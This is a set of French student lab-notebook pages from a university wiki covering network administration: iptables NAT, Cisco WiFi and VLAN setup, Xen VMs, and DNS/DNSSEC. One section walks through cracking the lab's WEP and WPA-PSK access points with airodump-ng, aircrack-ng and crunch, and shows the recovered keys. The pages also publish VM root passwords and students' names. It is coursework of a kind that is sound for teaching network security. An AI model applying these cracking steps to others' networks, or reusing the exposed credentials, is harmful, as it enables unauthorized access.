Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
</syntaxhighlight><br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Vlan15<br />
description "VLAN personnel de Cedric PAYET (E5) - WPA2-EAP"<br />
ip address 10.60.5.2 255.255.255.0<br />
ipv6 address 2001:660:4401:60a5::2/64<br />
vrrp 15 address-family ipv4<br />
priority 110<br />
address 10.60.5.1 primary<br />
exit-vrrp<br />
end<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
conf t<br />
vlan 15<br />
name E5-Cedric<br />
exit<br />
exit<br />
write<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&diff=12199
SE4 IdO sécurité système/réseau 2025/2026
2026-02-10T16:34:13Z
<p>Cpayet : /* Schéma de câblage */</p>
<hr />
<div>= Répartition des binômes pour les travaux pratiques "administration système et réseau" =<br />
<br />
Préfixe des noms de machine : <code>SE4</code>.<br />
<br />
Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elève !! Nom de domaine<br />
! Nom de machine de services !! Nom de machine mandataire<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice<br />
|-<br />
|}<br />
<br />
{| class="wikitable"<br />
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves <br />
|-<br />
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE<br />
|-<br />
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST<br />
|-<br />
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE<br />
|-<br />
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI <br />
|-<br />
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN<br />
|-<br />
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki<br />
|-<br />
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.<br />
|-<br />
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi <br />
|-<br />
|}<br />
<br />
= Tableau des commutateurs virtuels =<br />
<br />
{| class="wikitable"<br />
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé <br />
|-<br />
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24<br />
|-<br />
|PAYET / DELOBELLE<br />
|pont_pacman<br />
|192.168.10.0/24<br />
|-<br />
|MERIEN / VANGHELUWE<br />
|pont_pere<br />
|192.168.0.0/24<br />
|-<br />
|CHEKLAT / BIERNACKI<br />
|pont_ironman<br />
|192.168.69.0/24<br />
|-<br />
|SALHI<br />
|pont_msalhi<br />
|192.168.20.0/24<br />
|-<br />
|GOURVEST/GHAZALI<br />
|pont_diviseur<br />
|192.168.67.0/24<br />
|-<br />
|YAHIANI / TEPELI<br />
|pontclio<br />
|192.168.7.0/24<br />
|-<br />
|GAUTHIER / SOUOP METSE<br />
|pont_rock<br />
|192.168.50.0/24<br />
|}<br />
<br />
= Tableau des réseaux virtuels =<br />
<br />
VLAN privés :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| VLAN1 || 1<br />
|-<br />
| MV-PROMO || 2 <br />
|-<br />
|E1-Pierre<br />
|11<br />
|-<br />
|E2-Agathe<br />
|12<br />
|-<br />
|E5-Cedric<br />
|15<br />
|-<br />
|E6-Thomas<br />
|16<br />
|-<br />
|E9-Aurele<br />
|19<br />
|-<br />
|E10-Tom<br />
|20<br />
|-<br />
|E13-Billel<br />
|22<br />
|-<br />
|E14-Antonin<br />
|23<br />
|-<br />
|E15-MSalhi<br />
|25<br />
|-<br />
|E11-Evora<br />
|28<br />
|-<br />
|E12-Gauthier<br />
|21<br />
|}<br />
<br />
VLAN communs avec l'école :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| INTERCO1 || 530 <br />
|-<br />
|}<br />
<br />
= Schéma de câblage =<br />
<br />
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.<br />
<br />
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.<br />
<br />
= Plan d'adressage =<br />
<br />
{| class="wikitable"<br />
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 <br />
|-<br />
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code><br />
|-<br />
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code><br />
|-<br />
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code><br />
|-<br />
|PoolCedric<br />
|<code>10.60.5.0/24</code><br />
|2001:660:4401:60a5::/64<br />
|-<br />
|PoolThomas<br />
|<code>10.60.6.0/24</code><br />
|2001:660:4401:60a6::/64<br />
|-<br />
|PoolBillel<br />
|<code>10.60.13.0/24</code><br />
|2001:660:4401:60ad::/64<br />
|-<br />
|PoolAurele<br />
|<code>10.60.9.0/24</code><br />
|2001:660:4401:60a9::/64<br />
|-<br />
|PoolTom<br />
|<code>10.60.10.0/24</code><br />
|2001:660:4401:60aa::/64<br />
|-<br />
|PoolSalhi<br />
|<code>10.60.15.0/24</code><br />
|2001:660:4401:60b1::/64<br />
|-<br />
|PoolAntonin<br />
|<code>10.60.14.0/24</code><br />
|2001:660:4401:60ae::/64<br />
|}<br />
<br />
Adresses IPv4 des éléments réseau dans VLAN1<br />
<br />
{| class="wikitable"<br />
! Elément !! Adresse <br />
|-<br />
| Routeur C9200-E304 || 172.27.0.1/16<br />
|-<br />
| Routeur C9200-E306 || 172.27.0.2/16<br />
|-<br />
| Borne Wi-Fi E306 || 172.27.0.3/16<br />
|-<br />
| Borne Wi-Fi E304 || 172.27.0.4/16<br />
|}<br />
<br />
= Informations VRRP =<br />
<br />
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.<br />
<br />
== VLAN des machines virtuelles ==<br />
<br />
Une seule instance VRRP dans le VLAN des machines virtuelles.<br />
<br />
Adresse IPv4 virtuelle : <code>193.48.57.162</code><br />
<br />
{| class="wikitable"<br />
! Routeur !! IPv4 propre <br />
|-<br />
| C9200 E304 || <code>193.48.57.163</code><br />
|- <br />
| C9200 E306 || <code>193.48.57.164</code><br />
|-<br />
|}<br />
<br />
== VLAN ... ==</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12188
Atelier SysRes SE4 2025/2026 E5
2026-02-10T16:06:14Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
